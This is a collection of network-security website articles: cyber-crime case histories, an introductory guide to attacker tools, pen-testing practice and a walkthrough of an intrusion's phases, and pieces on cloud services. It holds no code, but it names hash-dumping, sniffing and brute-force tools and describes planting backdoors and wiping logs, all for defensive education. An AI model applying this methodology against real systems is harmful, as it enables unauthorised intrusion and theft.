Over the last decade all such systems have become connected to the internet. However, when SCADA was being developed no thought was given to security. No one imagined that a SCADA based system would end up on the internet. Functionality and convenience were given higher priority and security was ignored, hence SCADA carries the burden of inherent security flaws.

Tests have been performed extensively to map the vulnerabilities of a networked SCADA system. A test was done on a federal prison which used SCADA to control gates and security infrastructure. Within two weeks, a test hacker had full control of all the cell doors. The kit the hacker used was purchased from the open market for a value as low as $2500.

But, thankfully, more and more thought is given today when designing a SCADA based system which will be used over a network. Strict security policies and intrusion detection and avoidance technologies are implemented.

Where’s My Money?

The year 1994 – 1995 saw a momentous change in our financial industry: the entire financial sector was now online. Paper transactions were a thing of the past. Vast sums of money now change location in a matter of milliseconds. The share markets, along with complex monetary assets, now trade using the same cyber space which we use for social networking, shopping etc. As this involved a lot of money, money being transferred in unimaginable amounts, the financial industry, especially banks, went to great lengths to protect themselves.

As happens in our physical world with the advent of better locks thieves change their ways to adapt as well. Hackers have developed tools that can bypass encryptions to steal funds, or even hold an entire institution to ransom. Average annual loss due to cyber heist has been estimated at nearly 1.3 million dollars. Since banks hardly hold any cash in their branches your ordinary bank robbery would hardly amount to $6000 – $8000 in hard cash.

Cyber heist is a criminal industry with staggering rewards. The magnitude is in hundreds of billions of dollars. But most cyber intrusions in this industry go unreported because of its long term impact on the compromised institution’s reputation and credibility.

Your Card Is Now My Card!

network-security-credit-card-hacked2005: Miami, Florida. A Miami hacker made history in cyber theft. Alberto Gonzales would drive around Miami streets looking for unsecured wireless networks. He hooked onto the unsecure wireless network of a retailer, used it to reach the retailer’s headquarters and stole credit card numbers from its databases. He then sold these card details to Eastern European cyber criminals. In the first year, he stole 11.2 million card details. By the end of the second year he had stolen about 90 million card details.

He was arrested in July 2007 while trying to use one of these stolen cards. On subsequent interrogation it was revealed that he had stored away 43 million credit card details on servers in Latvia and Ukraine.

In recent times we know a certain gaming console organisation had its online gaming network hacked and customer details stolen. For that organisation, the security measures taken subsequent to that intrusion were ‘too little too late’, but all such companies that hold customer credit card details consequently improved their network security setup.

Meltdown By Swatting

January 2005: A hacker with the alias ‘dshocker’ was carrying out an all out attack on several big corporations in the US. He used stolen credit cards to fund his hacking activities. He managed to break through a firewall and infect large numbers of computers. This enabled him to take control of all of those machines and use their collective computing power to carry out a Denial of Service Attack on the corporation itself. The entire network went into a meltdown. Then he did something that is known today as ‘swatting’. Swatting is an action that dupes the emergency services into sending out an emergency response team. This false alarm and follow up raids would end up costing the civic authorities vast sums of money and resources.

He was finally arrested when his fraudulent credit card activities caught up with him.

Playing Safe In Today’s World

Today technology is a great equaliser. It has given the sort of power to individuals that only nations could boast of in the past. All the network intrusions and their subsequent effects can be used individually or together to bring a nation to its knees. The attackers can hide behind the cyber world and their attacks can strike anyone without warning. So what we need to do is to stay a step ahead.

We can’t abolish using the network, the cloud or the things that have given us more productivity and efficiency. We need to envelop ourselves with stricter security measures to ensure that all that belongs to us is safe, and amenities used by us everyday are not turned against us. This goes for everyone, big organisations and the individual using his home network.

At home, keep your wireless internet connection locked down with a proper password. Do not leave any default passwords unchanged. That is a security flaw that can be taken advantage of. On your PCs and desktops, every operating system comes with its own firewall. Keep it on. Turning it off for convenience will cost you more than keeping it on and allowing only certain applications to communicate safely with the internet. In your emails, if you don’t recognise a sender’s email, do not respond or click on any of the links it may carry. These can be viruses ready to attack your machines and create a security hole through which the hacker will enter your home network. And for cyber’s sake, please, you haven’t won a lottery or inherited millions from a dead relative. So all those emails telling you so are just fakes. They are only worth deleting.

The simple exercise of keeping your pop-up blocker turned on will keep your surfing through your browser a lot safer. Your operating system, mainly Windows and Linux, lets you keep a guest account so whenever a ‘guest’ wants to check his/her emails or surf the web have them use this account instead of your own. Not that you don’t trust your guest but they might innocently click on something while surfing and not know what cyber nastiness they have invited into your machine. The guest account has  minimal privileges for users so it can be safe. Also, all accounts must have proper passwords. Don’t let your machine boot up to an administrator account with no password set. That is a recipe for disaster. Don’t use a café’s wireless network to check your bank balance. That can wait till you reach home. Or just call the bank up. That’s safer.

At work, please don’t plug an unauthorised wireless access point into your corporate network, this can severely compromise it. Use strong passwords for accounts, remove old accounts not being used. Incorporate strong firewall rules and demarcate effective DMZ so that you stay safer. Stop trying to find a way to jump over a proxy, or disable it. You are using company time for a purpose that can’t be work related. If it is needed, ask the network administrator for assistance.

I am not an alarmist, nor do I believe in sensationalism. I believe in staying safe so that I can enjoy the fruits of technology. And so should you, because you deserve it.

Readers can also visit ourNetwork Security section which offers a number of interesting articles covering Network Security.

About the Writer

Arani Mukherjee holds a Master’s degree in Distributed Computing Systems from the University of Greenwich, UK and works as network designer and innovator for remote management systems, for a major telecoms company in UK. He is an avid reader of anything related to networking and computing. Arani is a highly valued and respected member of Firewall.cx, offering knowledge and expertise to the global community since 2005.

 

  • Hits: 16538

Introduction To Network Security - Part 2

This article builds upon our first article Introduction to Network Security - Part 1. This article is split into 5 pages and covers a variety of topics including:

  • Tools and Attacker Uses
  • General Network Tools
  • Exploits
  • Port Scanners
  • Network Sniffers
  • Vulnerability Scanners
  • Password Crackers
  • What is Penetration Testing
  • More Tools
  • Common Exploits
  • A Brief Walk-through of an Attack
  • and more.

Tools An Attacker Uses

Now that we've concluded a brief introduction to the types of threats faced by both home users and the enterprise, it is time to have a look at some of the tools that attackers use.

Keep in mind that a lot of these tools have legitimate purposes and are very useful to administrators as well. For example I can use a network sniffer to diagnose a low level network problem or I can use it to collect your password. It just depends which shade of hat I choose to wear.

General Network Tools

As surprising as it might sound, some of the most powerful tools especially in the beginning stages of an attack are the regular network tools available with most operating systems. For example and attacker will usually query the 'whois' databases for information on the target. After that he might use 'nslookup' to see if he can transfer the whole contents of their DNS zone (called a zone transfer -- big surprise !!). This will let him identify high profile targets such as webservers, mailservers, dns servers etc. He might also be able to figure what different systems do based on their dns name -- for example sqlserver.victim.com would most likely be a database server. Other important tools include traceroute to map the network and ping to check which hosts are alive. You should make sure your firewall blocks ping requests and traceroute packets.

Exploits

An exploit is a generic term for the code that actually 'exploits' a vulnerability in a system. The exploit can be a script that causes the target machine to crash in a controlled manner (eg: a buffer overflow) or it could be a program that takes advantage of a misconfiguration.

A 0-day exploit is an exploit that is unknown to the security community as a whole. Since most vulnerabilities are patched within 24 hours, 0-day exploits are the ones that the vendor has not yet released a patch for. Attackers keep large collections of exploits for different systems and different services, so when they attack a network, they find a host running a vulnerable version of some service and then use the relevant exploit.

Port Scanners

Most of you will know what portscanners are. Any system that offers TCP or UDP services will have an open port for that service. For example if you're serving up webpages, you'll likely have TCP port 80 open, FTP is TCP port 20/21, Telnet is TCP 23, SNMP is UDP port 161 and so on.

A portscanner scans a host or a range of hosts to determine what ports are open and what service is running on them. This tells the attacker which systems can be attacked.
For example, if I scan a webserver and find that port 80 is running an old webserver -- IIS/4.0, I can target this system with my collection of exploits for IIS 4. Usually the port scanning will be conducted at the start of the attack, to determine which hosts are interesting.

This is when the attacker is still footprinting the network -- feeling his way around to get an idea of what type of services are offered and what Operating Systems are in use etc. One of the best portscanners around is Nmap (https://www.insecure.org/nmap). Nmap runs on just about every operating system is very versatile in how it lets you scan a system and has many features including OS fingerprinting, service version scanning and stealth scanning. Another popular scanner is Superscan (https://www.foundstone.com) which is only for the windows platform.

Network Sniffers

A network sniffer puts the computers NIC (network interface card or LAN card) into 'promiscuous mode'. In this mode, the NIC picks up all the traffic on its subnet regardless of whether it was meant for it or not. Attackers set up sniffers so that they can capture all the network traffic and pull out logins and passwords. The most popular network sniffer is TCPdump as it can be run from the command line -- which is usually the level of access a remote attacker will get. Other popular sniffers are Iris and Ethereal.

When the target network is a switched environment (a network which uses layer 2 switches), a conventional network scanner will not be of any use. For such cases, the switched network sniffer Ettercap (http://ettercap.sourceforge.net) and WireShark (https://www.wireshark.org) are very popular. Such programs are usually run with other hacking capable applications that allow the attacker to collect passwords, hijack sessions, modify ongoing connections and kill connections. Such programs can even sniff secured communications like SSL (used for secure webpages) and SSH1 (Secure Shell - a remote access service like telnet, but encrypted).

Vulnerability Scanners

A vulnerability scanner is like a portscanner on steroids, once it has identified which services are running, it checks the system against a large database of known vulnerabilities and then prepares a report on what security holes are found. The software can be updated to scan for the latest security holes. These tools are very simple to use unfortunately, so many script kiddies simply point them at a target machine to find out what they can attack. The most popular ones are Retina (http://www.eeye.com), Nessus (http://www.nessus.org) and GFI LanScan (http://www.gfi.com). These are very useful tools for admins as well as they can scan their whole network and get a detailed summary of what holes exist.

Password Crackers

Once an attacker has gained some level of access, he/she usually goes after the password file on the relevant machine. In UNIX like systems this is the /etc/passwd or /etc/shadow file and in Windows it is the SAM database. Once he gets hold of this file, its usually game over, he runs it through a password cracker that will usually guarantee him further access. Running a password cracker against your own password files can be a scary and enlightening experience. L0phtcrack cracked my old password fR7x!5kK after being left on for just one night !

There are essentially two methods of password cracking :

Dictionary Mode - In this mode, the attacker feeds the cracker a word list of common passwords such as 'abc123' or 'password'. The cracker will try each of these passwords and note where it gets a match. This mode is useful when the attacker knows something about the target. Say I know that the passwords for the servers in your business are the names of Greek Gods (yes Chris, that's a shout-out to you ;)) I can find a dictionary list of Greek God names and run it through the password cracker.

Most attackers have a large collection of wordlists. For example when I do penetration testing work, I usually use common password lists, Indian name lists and a couple of customized lists based on what I know about the company (usually data I pick up from their company website). Many people think that adding on a couple of numbers at the start or end of a password (for example 'superman99') makes the password very difficult to crack. This is a myth as most password crackers have the option of adding numbers to the end of words from the wordlist. While it may take the attacker 30 minutes more to crack your password, it does not make it much more secure.

Brute Force Mode - In this mode, the password cracker will try every possible combination for the password. In other words it will try aaaaa, aaaab, aaaac, aaaad etc. this method will crack every possible password -- its just a matter of how long it takes. It can turn up surprising results because of the power of modern computers. A 5-6 character alphanumeric password is crackable within a matter of a few hours or maybe a few days, depending on the speed of the software and machine. Powerful crackers include l0phtcrack for windows passwords and John the Ripper for UNIX style passwords.

For each category, I have listed one or two tools as an example. At the end of this article I will present a more detailed list of tools with descriptions and possible uses.


What is Penetration-Testing?

Penetration testing is basically when you hire (or perform yourself) security consultants to attack your network the way an attacker would do it, and report the results to you enumerating what holes were found, and how to fix them. It's basically breaking into your own network to see how others would do it.

While many admins like to run quick probes and port scans on their systems, this is not a penetration test -- a penetration tester will use a variety of specialised methods and tools from the underground to attempt to gain access to the network. Depending on what level of testing you have asked for, the tester may even go so far as to call up employees and try to social engineer their passwords out of them (social engineering involves fooling a mark into revealing information they should not reveal).

An example of social engineering could be an attacker pretending to be someone from the IT department and asking a user to reset his password. Penetration testing is probably the only honest way to figure out what security problems your network faces. It can be done by an administrator who is security aware, but it is usually better to pay an outside consultant who will do a more thorough job.

I find there's a lack of worthwhile information online about penetration testing -- nobody really goes about describing a good pen test, and what you should and shouldn't do. So I've hand picked a couple of good papers on the subject and then given you a list of my favourite tools, and the way I like to do things in a pen-test.

This is by no means the only way to do things, it's like subnetting -- everyone has their own method -- this is just a systematic approach that works very well as a set of guidelines. Depending on how much information you are given about the targets as well as what level of testing you're allowed to do, this method can be adapted.

Papers Covering Penetration Testing

I consider the following works essential reading for anyone who is interested in performing pen-tests, whether for yourself or if you're planning a career in security:

'Penetration Testing Methodology - For Fun And Profit' - Efrain Tores and LoNoise, you can google for this paper and find it.

'An Approach To Systematic Network Auditing' - Mixter (http://mixter.void.ru)

'Penetration Testing - The Third Party Hacker' - Jessica Lowery. Boy is this ever a good paper ! (https://www.sans.org/rr/papers/index.php?id=264)

'Penetration Testing - Technical Overview' - Timothy P. Layton Sr. also from the www.sans.org (https://www.sans.org) reading room

Pen-test Setup

I don't like working from laptops unless its absolutely imperative, like when you have to do a test from the inside. For the external tests I use a Windows XP machine with Cygwin (www.cygwin.com) and VMware (www.vmware.com) most linux exploits compile fine under cygwin, if they don't then I shove them into vmware where I have virtual machines of Red Hat, Mandrake and Win2k boxes. In case that doesnt work, the system also dual boots Red Hat 9 and often I'll just work everything out from there.

I feel the advantage of using a microsoft platform often comes from the fact that 90% of your targets may be microsoft systems. However the flexibility under linux is incomparable, it is truely the OS of choice for any serious hacker.. and as a result, for any serious security professional. There is no best O/S for penetration testing -- it depends on what you need to test at a point in time. That's one of the main reasons for having so many different operating systems set up, because you're very likely to be switching between them for different tasks.

If I don't have the option of using my own machine, I like to choose any linux variant.
I keep my pen-tests strictly to the network level, there is no social engineering involved or any real physical access testing other than basic server room security and workstation lockdown (I don't go diving in dumpsters for passwords or scamming employees).

I try as far as possible to determine the Rules Of Engagement with an admin or some other technically adept person with the right authorisation, not a corporate type. This is very important because if you do something that ends up causing trouble on the network, its going to make you look very unprofessional. It's always better to have it done clearly in writing -- this is what you are allowed to do.

I would recommend this even if you're an admin conducting an in-house test. You can get fired just for scanning your own network if its against your corporate policy. If you're an outside tester, offer to allow one of their people to be present for your testing if they want. This is recommended as they will ultimately be fixing most of these problems and being in-house people they will be able to put the results of the test in perspective to the managers.

Tools

I start by visiting the target website, running a whois, DNS zone transfer (if possible) and other regular techniques which are used to gather as much network and generic information about the target. I also like to pick up names and email addresses of important people in the company -- the CEO, technical contacts etc. You can even run a search in the newsgroups for @victim.com to see all the public news postings they have made. This is useful as a lot of admins frequent bulletin boards for help. All this information goes into a textfile. Keeping notes is critically important, it's very easy to forget some minor detail that you should include in your end report.

Now for a part of the arsenal -- not in any order and far from the complete list.

Nmap - Mine (and everyone elses) workhorse port scanner with version scanning, multiple scan types, OS fingerprinting and firewall evasion tricks. When used smartly, Nmap can find any Internet facing host on a network.

Nessus - My favourite free vulnerability scanner, usually finds something on every host. Its not too stealthy though and will show up in logs (this is something I don't have to worry about too much).

Retina - A very good commercial vulnerability scanner, I stopped using this after I started with nessus but its very very quick and good. Plus its vulnerability database is very up-to-date.

Nikto - This is a webserver vulnerability scanner. I use my own hacked up version of this perl program which uses the libwhisker module. It has quite a few IDS evasion modes and is pretty fast. It is not that subtle though, which is why I modified it to be a bit more stealthy.

Cisco Scanner - This is a small little windows util I found that scans IP ranges for routers with the default password of 'cisco'. It has turned up some surprising results in the past and just goes to show how even small little tools can be very useful. I am planning to write a little script that will scan IP ranges looking for different types of equipment with default passwords.

Sophie Script - A little perl script coupled with user2sid and sid2user (two windows programs) which can find all the usernames on a windows machine.

Legion - This is a windows file share scanner by the erstwhile Rhino9 security group. It is fast as hell and allows you to map the drive right from in the software.

Pwdump2 - Dumps the content of the windows password sam file for loading into a password cracker.

L0phtcrack 3.0 - Cracks the passwords I get from the above or from its own internal SAM dump. It can also sniff the network for password hashes or obtain them via remote registry. I have not tried the latest version of the software, but it is very highly rated.

Netcat - This is a TCP/UDP connection backend tool, oh boy I am lost without this ! Half my scripts rely on it. There is also an encrypted version called cryptcat which might be useful if you are walking around an IDS. Netcat can do anything with a TCP or UDP connection and it serves as my replacement to telnet as well.

Hping2 - A custom packet creation utility, great for testing firewall rules among other things.

SuperScan - This is a windows based port scanner with a lot of nice options. Its fast, and has a lot of other neat little tools like NetBIOS enumeration and common tools such as whois, zone transfers etc.

Ettercap - When sniffing a switched network, a conventional network sniffer will not work. Ettercap poisons the ARP cache of the hosts you want to sniff so that they send packets to you and you can sniff them. It also allows you to inject data into connections and kill connections among other things.

Brutus - This is a fairly generic protocol brute forcing tool. It can bruteforce HTTP, FTP, Telnet and many other login authentication systems. This is a windows tool, however I prefer Hydra for linux.

Bunch of Common Exploits Effeciently Sorted

This is my collection of exploits in source and binary form. I sort them in subdirectories by operating system, then depending on how they attack - Remote / Local and then according to what they attack - BIND / SMTP / HTTP / FTP / SSH etc etc. The binary filenames are arbitrary but the source filenames instantly tell me the name of the exploit and the version of the software vulnerable.

This is essential when you're short on time and you need to 'pick one'. I don't include DoS or DDoS exploits, there is nobody I know who would authorise you to take down a production system. Don't do it -- and tell them you arent doing it.. and only if they plead with you should you do it.

Presenting Reports

This is the critical part -- it's about presenting what you found to people who probably don't understand a word of what your job is about other than you're costing them money. You have to show them that there are some security problems in your network, and this is how serious they might be.

A lot of people end the pen-test after the scanning stage. Unless someone specifically tells me to do this, I believe it is important you exploit the system to at least level 1. This is important because there is a very big difference in saying something is vulnerable and actually seeing that the vulnerability is executable. Not to mention when dealing with a corporate type, seeing 'I gained access to the server' usually gets more attention than 'the server is vulnerable to blah blah'.

After you're done, make a VERY detailed chronological report of everything you did, including which tools you used, what version they are, and anything else you did without using tools (eg. SQL injection). Give gory technical details in annexes -- make sure the main document has an executive summary and lots of pie charts that they can understand. Try and include figures and statistics for whatever you can.

To cater to the admins, provide a report for each host you tested and make sure that for every security hole you point out, you provide a link to a site with a patch or fix, . Try to provide a link to a site with detailed information about the hole preferably bugtraq or some well known source -- many admins are very interested in these things and appreciate it.


A Brief Walk-through of an Attack

This is an account of how an attacker in the real world might go about trying to exploit your system. There is no fixed way to attack a system, but a large number will follow the similar methodology or at least the chain of events.

This section assumes that the attacker is moderately skilled and moderately motivated to breaking into your network. He/She has targeted you due to a specific motive -- perhaps you sacked them, or didn't provide adequate customer support (D-link India are you listening ? ;)). Hopefully this will help you figure out where your network might be attacked, and what an attacker might do once they are on the inside.

Remember that attackers will usually choose the simplest way to get into the network. The path of least resistance principle always applies.

Reconnaissance & Footprinting

Here the attacker will try to gather as much information about your company and network as they can without making a noise. They will first use legitimate channels, such as google and your company webpage to find out as much about you as they can. They will look for the following information:


Technical information is a goldmine, things like a webpage to help your employees log in from home will be priceless information to them. So also will newsgroup postings by your IT department asking how to set up particular software, as they now know that you use this software and perhaps they know of a vulnerability in it.

Personal information about the company and its corporate structure. They will want information on the heads of IT departments, the CEO and other people who have a lot of power. They can use this information to forge email, or social engineer information out of subordinates.

Information about your partners. This might be useful information for them if they know you have some sort of network connection to a supplier or partner. They can then include the supplier's systems in their attack, and find a way in to your network from there.

General news. This can be useful information to an attacker as well. If your website says that it is going down for maintenance for some days because you are changing your web server, it might be a clue that the new setup will be in its teething stages and the admins may not have secured it fully yet.

They will also query the whois databases to find out what block of IP addresses you own. This will give them a general idea of where to start their network level scans.
After this they will start a series of network probes. The most basic of which will be to determine if you have a firewall, and what it protects. They will try and identify any systems you have that are accessible from the Internet.

The most important targets will be the ones that provide public services. These will be :

Webservers - usually the front door into the network. All webserver software has some bugs in it, and if you're running home made CGI scripts such as login pages etc, they might be vulnerable to techniques such as SQL injection.

Mail servers - Sendmail is very popular and most versions have at least one serious vulnerability in them. Many IT heads don't like to take down the mail server for maintenance as doing without it is very frustrating for the rest of the company (especially when the CEO doesn't get his mail).

DNS servers - Many implementations of BIND are vulnerable to serious attacks. The DNS server can be used as a base for other attacks, such as redirecting users to other websites etc.

Network infrastructure - Routers and switches may not have been properly secured and may have default passwords or a web administration interface running. Once controlled they can be used for anything from a simple Denial of Service attack by messing up their configurations, to channeling all your data through the attackers machine to a sniffer.

Database servers - Many database servers have the default sa account password blank and other common misconfigurations. These are very high profile targets as the criminal might be looking to steal anything from your customer list to credit card numbers. As a rule, a database server should never be Internet facing.

The more naive of the lot (or the ones who know that security logs are never looked at) may run a commercial vulnerability scanner such as nessus or retina over the network. This will ease their work.

Exploitation Phase

After determining which are valid targets and figuring out what OS and version of software they are using (example which version of Apache or IIS is the web server running), the attacker can look for an exploit targeting that particular version. For example if they find you are running an out of date version of Sendmail, they will look for an exploit targeting that version or below.

They will first look in their collection of exploits because they have tested these. If they cannot find one, they will look to public repositories such as https://www.packetstormsecurity.nl. They will probably try to choose common exploits as these are more likely to work and they can probably test them in their own lab.

From here they have already won half the game as they are behind the firewall and can probably see a lot more of the internal network than you ever intended for them to. Many networks tend to be very hard to penetrate from the outside, but are woefully unprotected internally. This hard exterior with a mushy interior is a recipe for trouble -- an attacker who penetrates the first line of defense will have the full run of your network.

After getting in, they will also probably install backdoors on this first compromised system to provide them with many ways in, in case their original hole gets shut down. This is why when you identify a machine that was broken into, it should be built up again from scratch as there is no way of knowing what kind of backdoors might be installed. It could be tricky to find a program that runs itself from 2:00AM to 4:00AM every night and tries to connect to the attackers machine. Once they have successfully guaranteed their access, the harder part of the intrusion is usually over.

Privilege Escalation Phase

Now the attacker will attempt to increase his security clearance on the network. He/She will usually target the administrator accounts or perhaps a CEO's account. If they are focused on a specific target (say your database server) they will look for the credentials of anyone with access to that resource. They will most likely set up a network sniffer to capture all the packets as they go through the network.

They will also start manually hunting around for documents that will give them some interesting information or leverage. Thus any sensitive documents should be encrypted or stored on systems with no connection to the network. This will be the time they use to explore your internal network.

They will look for windows machines with file sharing enabled and see what they can get out of these. Chances are if they didn't come in with a particular objective in mind (for example stealing a database), they will take whatever information they deem to be useful in some way.

Clean Up Phase

Now the attacker has either found what they were looking for, or are satisfied with the level of access they have. They have made sure that they have multiple paths into the network in case you close the first hole. They will now try to cover up any trace of an intrusion. They will manually edit log files to remove entries about them and will make sure they hide any programs they have installed in hard to find places.

Remember, we are dealing with an intruder who is moderately skilled and is not just interested in defacing your website. They know that the only way to keep access will be if you never know something is amiss. In the event that there is a log they are unable to clean up, they may either take a risk leaving it there, or flood the log with bogus attacks, making it difficult for you to single out the real attack.


Where Can I Find More Information?

Without obviously plugging our site too much, the best place for answers to questions relating to this article is in our forums. The Security/Firewalls Forum is the best place to do this -- so you can ask anything from the most basic to the most advanced questions concerning network security there. A lot of common questions have already been answered in the forums, so you will quite likely find answers to questions like 'Which firewall should I use ?'.

As far as off-site resources are concerned, network security is a very vast field and there is seemingly limitless information on the subject. You will never find information at so-called hacker sites full of programs. The best way to learn about network security is to deal with the first word first -- you should be able to talk networking in and out, from packet header to checksum, layer 1 to layer 7.

Once you've got that down, you should start on the security aspect. Start by reading a lot of the papers on the net. Take in the basics first, and make sure you keep reading. Wherever possible, try to experiment with what you have read. If you don't have a home lab, you can build one 'virtually'. See the posts in the Cool Software forum about VMware.


Also, start reading the security mailing lists such as bugtraq and security-basics. Initially you may find yourself unable to understand a lot of what happens there, but the newest vulnerabilities are always announced on these lists. If you follow a vulnerability from the time its discovered to when someone posts an exploit for it, you'll get a very good idea of how the security community works.. and you'll also learn a hell of a lot in the process.

If you're serious about security, it is imperative that you learn a programming language, or at least are able to understand code if not write your own. The best choices are C and assembly language. However knowing PERL and Python are also valuable skills as you can write programs in these languages very quickly.

For now, here are a few links that you can follow for more information:

www.securityfocus.com - A very good site with all the latest news, a very good library and tools collection as well as sections dedicated to basics, intrusion detection, penetration testing etc. Also home of the Bugtraq mailing list.

www.sans.org - A site with excellent resources in its reading room, people who submit papers there are trying for a certification and as a result its mostly original material and of a very high calibre.

www.security-portal.com - A good general security site.

www.cert.org - The CERT coordination center provides updates on the latest threats and how to deal with them. Also has very good best practice tips for admins.

www.securityfocus.com/archive/1 - This is the link to Bugtraq, the best full disclosure security mailing list on the net. Here all the latest vulnerabilities get discussed way before you see them being exploited or in the press.

www.insecure.org - The mailing lists section has copies of bugtraq, full disclosure, security-basics, security-news etc etc. Also the home of nMap, the wonderful port scanner.

seclists.org - This is a direct link to the security lists section of insecure.org.

www.grc.com - For windows home users and newbies just interested in a non technical site. The site is home to Shields Up, which can test your home connection for file sharing vulnerabilities, do a port scan etc, all online. It can be a slightly melodramatic site at times though.

www.eeye.com - Home of the Retina Security Scanner. Considered the industry leader. The E-Eye team also works on a lot of the latest vulnerabilities for the windows platform.

www.nessus.org - Open source vulnerability scanner, and IMNSHO the best one going. If you're a tiger team penetration tester and you don't point nessus at a target, you're either really bad at your job or have a very large ego. If there's a vulnerability in a system, nessus will find it.

www.zonelabs.com - ZoneAlarm personal firewall for windows, considered the best, and also the market leader.

www.sygate.com - Sygate Personal Firewall, provides more configuration options than ZoneAlarm, but is consequently harder to use.

www.secinf.net - Huge selection of articles that are basically windows security related.

www.searchsecurity.com - A techtarget site which you should sign up for, very good info. Chris writes for searchnetworking.com its sister site.. I don't think the references could be much better.

www.antioffline.com - A very good library section on buffer overflows etc.

www.packetstormsecurity.nl - The largest selection of tools and exploits possible.


Conclusion

This 5-page article should serve as a simple introduction to network security. The field itself is too massive to cover in any sort of article, and the amount of cutting edge research that goes on really defies comprehension.

Some of the most intelligent minds work in the security field because it can be a very challenging and stimulating environment. If you like to think out-of-the-box and are the sort of person willing to devote large amounts of your time to reading and questioning why things happen in a particular way, security might be a decent career option for you.

Even if you're not interested in it as a career option, every admin should be aware of the threats and the solutions. Remember, you have to think like them to stop them !

If you're interested in network security, we highly recommend you read through the networking and firewall sections of this website. Going through the whole site will be some of the most enlightening time you'll ever spend online.

If you're looking for a quick fix, here are a few of the more important areas that you might want to cover:

Introduction to Networking

Introduction to Firewalls

Introduction to Network Address Translation (NAT)

Denial Of Service (DoS) Attacks

Locking down Windows networks

Introduction to Network Protocols

Also check out our downloads section where you will find lots of very good security and general networking tools.

We plan on putting up a lot of other security articles in the near future. Some will be basic and introductory like this one, while some may deal with very technical research or techniques.

As always feel free to give us feedback and constructive criticism. All flames however will be directed to /dev/null ;)

  • Hits: 66542

Are Cloud-Based Services Overhyped?

In these hard economic times, cloud computing is becoming a more attractive option for many organizations. Industry analyst firm, The 451 Group predicts that the marketplace for cloud computing will grow from $8.7bn in revenue in 2010 to $16.7bn by 2013. Accompanying this is an increasing amount of hype about cloud computing.

Cloud computing has gone through different stages, yet because the Internet only began to offer significant bandwidth in the 1990s, it became something for the masses over the last decade. Initial applications were known as Hosted Services. Then the term Application Service Provider emerged, with some hosted offerings known as Managed Services. More recently, in addition to these terms, Software as a Service (SaaS) became a catchphrase.  And as momentum for hosted offerings grew, SaaS is now complemented by Infrastructure as a Service, Platform as a Service, and even Hardware as a Service.

Is this a sign of some radical technology shift, or simply a bit more of what we have seen in the past? 

The answer is both. We are witnessing a great increase in global investment towards hosted offerings. These providers are expected to enjoy accelerated growth as Internet bandwidth becomes ubiquitous, faster, and less expensive; as network devices grow smaller; and as critical mass builds. Also, organizations are moving towards cloud services of all kinds through the use of different types of network devices – take, for example, the rise of smart phones, the iPad tablet, and the coming convergence of television and the Internet.

Yet, although cloud solutions may emerge as dominant winners in some emerging economies, on-premise solutions will remain in use. While start-ups and small businesses might find the cloud as the cheaper and safer option for their business – enjoying the latest technology without needing to spend money on an IT infrastructure, staff, and other expenses that come with on premise solutions; larger businesses usually stick to on-premise solutions for both philosophical and practical reasons such as wishing to retain control, and the ability to configure products for their own specific needs.

Gartner's chief security analyst, John Pescatore, for example, believes that cloud security is not enough when it comes to the upper end of the enterprise, financial institutions, and the government. On the other hand, he states that smaller businesses may actually get better security from the cloud. The reason behind this is that while the former has to protect confidential data and cannot pass it on to third parties, the latter is given better security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more).

Although the cloud might appear to be finding its fertile ground only now, especially in these times of belt-tightening, hosted services have been around for a while. For this reason, when choosing a cloud provider, always make sure you choose a company that has proven itself in the marketplace.

 

  • Hits: 13546

What if it Rains in the Cloud?

Cloud computing has become a cost-effective model for small and medium-sized enterprises, SMEs, that wish to use the latest technology on-demand and with no commitments or need to purchase and manage software products. These features have made hosted services an attractive choice, such that industry analyst firm, The 451 Group, has predicted the marketplace for cloud computing will grow from $8.7billion in revenue in 2010 to $16.7billion by 2013.

Yet, many organizations think twice when it comes to entrusting their data to third parties. Let's face it, almost every web user has an account on sites such as Gmail or Facebook – where personal information is saved on a separate mainframe; but when it comes to businesses allowing corporate data to go through third parties, the danger and implications are greater as an error affects a whole system, not just a single individual.

So The Question Arises: What If It Rains In The Cloud?

Some SMEs are apprehensive about using hosted services because their confidential data is being handled by third parties and because they believe the solution provider might fail. Funnily enough, it's usually the other way around. Subject to selecting a reputable provider, smaller businesses can attain better security via cloud computing as the solution provider usually invests more in security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more) than any individual small business could. Also, the second the service provider patches security vulnerability, all customers are instantly protected, as opposed to downloadable patches that the IT team within a company must apply.

And, to prevent data leaks, cloud services providers make it their aim to invest in the best technology infrastructures to protect their clients' information, knowing that even the slightest mistake can ruin their reputation – not to mention potential legal claims – and, with that, their business.

A drawback with some hosted services is that if you decide you want to delete a cloud resource, this might not result in true wiping of the data. In some cases, adequate or timely deletion might be impossible for example, because the disk that needs to be destroyed also stores data from other clients. Also, certain organizations find it difficult to entrust their confidential data to third parties.

Use Your Umbrella

Cloud computing can be the better solution for many SMEs, particularly in the case of start-ups and small businesses which cannot afford to invest in a proper IT infrastructure. The secret is to know what to look for when choosing a provider: Engage the services of a provider that will provide high availability and reliability. It would be wise to avoid cloud service providers that do not have much of a track record, and that perhaps are of limited size and profitability, subject to M&A activity, and changing development priorities.

To enjoy the full potential promised by the technology, it is important to choose a hosted service provider that has proven itself in the marketplace and that has solid ownership and management, applies stringent security measures, uses multiple data centers so as to avoid a single point of failure, provides aggressive solid service level agreement, and is committed to cloud services for the long term.

Following these suggestions, you can have a peace of mind that your data is unlikely to be subjected to ‘bad weather'!

  • Hits: 15528

Three Reasons Why SMEs Should Also Consider Cloud-Based Solutions

Small and medium enterprises (SMEs) are always looking for the optimum way to implement technology within their organizations be it from a technical, financial or personal perspective. Technology solutions can be delivered using one of three common models: as on-premise solutions (i.e. installed on company premises), hosted services (handled by an external third party) or a mix of both. Let's take a look at the cloud-based solutions in this brief post.

The Reasons for Cloud-based Backup Solutions

When talking about a hosted service, we are referring to a delivery model which enables SMEs to make the most out of the latest technology through a third party. Cloud-based solutions or services are gaining in popularity as an alternative strategy for businesses , especially for startups and small businesses, particularly when considering the three reasons below:

•  Financial – Startups and very small SMEs often find it financially difficult to set up the infrastructure and IT system required when they are starting or still building the business. The additional cost to build an IT infrastructure and recruit IT personnel is at times too high and not a priority IT when they just need email and office tools. In such scenario a hosted service makes sense because the company can depend on a third party to provide additional services, such as archiving and email filtering, at a monthly cost. This reduces costs and allows the business to focus on other important areas requiring investment. As the business grows, the IT needs of that company will dictate to what extent a hosted or managed service is necessary and cost-effective.

